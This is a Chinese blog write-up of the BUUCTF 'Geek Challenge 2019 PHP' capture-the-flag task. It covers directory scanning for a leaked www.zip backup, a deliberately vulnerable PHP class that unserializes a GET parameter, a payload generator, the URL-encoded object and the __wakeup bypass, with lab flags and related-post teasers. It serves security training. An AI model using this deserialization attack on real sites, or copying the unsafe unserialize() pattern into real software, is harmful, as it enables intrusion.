【BUUCTF-web】极客大挑战-2019 PHP

已于 2023-11-13 10:54:34 修改
阅读量110 收藏
点赞数
分类专栏: CTF-WEB 文章标签: 前端 php 网络安全
于 2023-11-13 10:51:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48149564/article/details/134370283
版权

项目地址:极客大挑战2019PHP

在这里插入图片描述

首先能看到网站首页给出有网页备份,那就用目录扫描工具7kbscan

7kbscan下载地址:https://github.com/7kbstorm/7kbscan-WebPathBrute

在这里插入图片描述

既然说是备份一般是以压缩包形式出现勾选自定义类型为.zip,扫描出www.zip文件下载(线程不要太多容易把网站崩掉)。

在这里插入图片描述

发现这五个文件先看flag.php,发现没东西

在这里插入图片描述

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

再看index.php,首先包含了一个文件class.php,GET接收select参数将收到的参数进行反序列化。

有很多css样式和html我这边直接留有用的php代码:


    <?php
    include 'class.php';			//包含文件
    $select = $_GET['select']; 		//GET接收参数
    $res=unserialize(@$select);		//将接收的参数反序列化
    ?>

我们再接着看class.php文件

<?php
include 'flag.php';


error_reporting(0);

//定义了一个对象:Name
class Name{
	//使用private定义了两个变量
    private $username = 'nonono';
    private $password = 'yesyes';
	
	//使用__construct类中的魔法方法(当一个对象创建时被调用)
    public function __construct($username,$password){
    	//给变量赋值
        $this->username = $username;
        $this->password = $password;
    }
	//wakeup方法在对象被反序列化之前被调用
    function __wakeup(){
    	//在反序列化之前会把username赋值为guest
        $this->username = 'guest';
    }
	//wakeup方法在对象销毁时被调用
    function __destruct(){
    	//如果password值不等于100时执行
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        //如果username全等于admin时执行
        if ($this->username === 'admin') {
            global $flag;
            //输出flag
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

这边我根据题型写的pyload

<?php

    class Name{
        private $username = 'admin';
        private $password = 100;

    }
    $name = new Name();
    //因为是private定义的变量序列化时有不可见字符所以需要url编码一下
    echo urlencode(serialize($name));

?>

运行一下pyload得出序列化的内容

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

在这里插入图片描述

接着用burp抓包构造

发现不行,还是需要绕过wakeup

 function __wakeup(){
    	//在反序列化之前会把username赋值为guest
        $this->username = 'guest';
    }

在这里插入图片描述

将序列化过的对象属性数值改大就可以了

在这里插入图片描述

在这里插入图片描述

flag{6da1063d-1592-4978-b64b-b2ac35b4ed5e}
栖山️
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 4483
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF -> Web [极客挑战 2019]Http(详解)
m0_72986388的博客
09-25 1186
之后界面会显示“No!" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。这样就会得到flag之后将flag输入到靶场中这道题就完成了。User-Agent:标识发起请求的用户代理(常为浏览器)。(因为做笔记,所以重新做的,所以显示早就解出这道题了。Referer(请求头字段)表示指示请求的来源页面。所以我们要把此段的浏览器改为Syclover浏览器。"理解为一个链接地址。这样我们就得到了解决本题的有用信息。
BUUCTF-[极客挑战 2019]PHP
rumil的博客
06-29 197
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
BUUCTF[极客挑战 2019]PHP1题解
cxm4545的博客
04-26 515
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 287
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 7975
SQL注入。
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
基于Java的geekanime-backend极客动漫设计源码
05-24
本项目是基于Java的geekanime-backend极客动漫设计源码,包含256个文件,其中包括225个Java文件、23个XML文件、3个YAML文件、1个Gitignore文件、1个Dockerfile文件、1个Markdown文件、1个JSON文件和1个XLSX文件。...
微信小程序-极客学院.zip
04-14
微信小程序-极客学院.zip,小程序模板代码,基于微信小程序的在线免费小说的开发。,可以直接从源码里粘贴复制过来,虽然这样做不利于自己独立编写代码。
微信小程序-- 极客学院
04-02
微信小程序-- 极客学院,微信小程序,极客学院,小程序
buuctf web [极客挑战 2019]Secret File
m0_61903191的博客
09-13 308
看不到看不到看不到,我的flag呢,我的flag呢,我的flag呢,还给我还给我还给我,呜呜呜还给我啊,你还给我,啊啊啊啊啊啊,掀桌,不学了,不学了,掀桌,砸电脑,砸桌子,砸学校(不敢)提示找到了,却看不见,应该想到php代码是无法在前端直接显示的(即flag应该是被包含在<?嘿嘿,是flag是flag是flag,找到你了,找到你了,找到你了,终于出来了,终于出来了,终于出来了。这一块源码中有个隐藏的超链接,点击后跳转到了新页面。新页面的源码里,也有一处可以跳转的超链接。flag放在flag.php里。
web安全入门-buuctf-[极客挑战 2019]PHP 1
2301_80137226的博客
04-21 323
class定义了一个Name,当password=100和username=admin时会输出flag。有点提示,‘有一个良好的备份网站的习惯’,我们尝试一下看一下网站目录,或尝试输入网站源码来备份文件。发现index.php包含了class.php还有一个select为变量,我们看一下class。调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过,把。一,使用用dirsearch或dirmap来扫描网站。后面的2改为3或以上即可。得到了这样的一个URL。
[极客挑战 2019]PHP unserialize
qq_45951598的博客
10-26 641
这里我用的是buuctf里面的[极客挑战 2019]PHP 1。 这里我们看到题目,然后发现提示,他说有网站备份,我们知道备份文件一般是bak格式的,这里我用xshell连接kali,然后用kali去扫描网站目录。 这里dirsearch在kali不是自带的,要自己去下一条命令就可以下载好,然后自己学一下如何扫描,很简单。 进入目录之后输入网址 这里发现有非常多的目录 但是发现这个颜色不一样,事出反常必有妖,所以访问看看。 这里发现需要下载文件,然后我们把文件下载一下,看一下。 这里我们解压一下发现这里应
BUUCTF - Web - PHP
1tachi的博客
11-27 451
敏感文件泄露 访问www.zip 解压 class.php中是PHP源码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = .
BUUCTF web 系列详解 (详细版)持续更新中
llki666的博客
12-27 1613
mb_strpos为查找某值第一次出现的位置,这里表示截取page从0开始到第一个问号之间的字符 串,赋值给_page*/万能密码:1 and 1=1(数字型) 或1' and '1'='1(字符型)或 1 or 1=1(数字型) 或 1 or '1'='1(字符型)/*mb_substr为截断函数,第一个参数为传进来的字符串,第二个为起始位置,第三个参数为长度。mb_substr("abbcv", 0, 2)从第0个位置开始,截取前2个字符串 // 输出:ab。函数截取其中的问号位置之前的子串。
【CTF WebBUUCTF BUU LFI COURSE 1 Writeup(代码审计+PHP+文件包含漏洞)
最新发布
HEX9CF的技术博客
06-01 552
1点击启动靶机。
BUUCTF [极客挑战 2019]PHP 1
weixin_45642610的博客
01-14 5217
BUUCTF [极客挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
BUUCTF——phpweb
weixin_45864041的博客
04-17 612
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值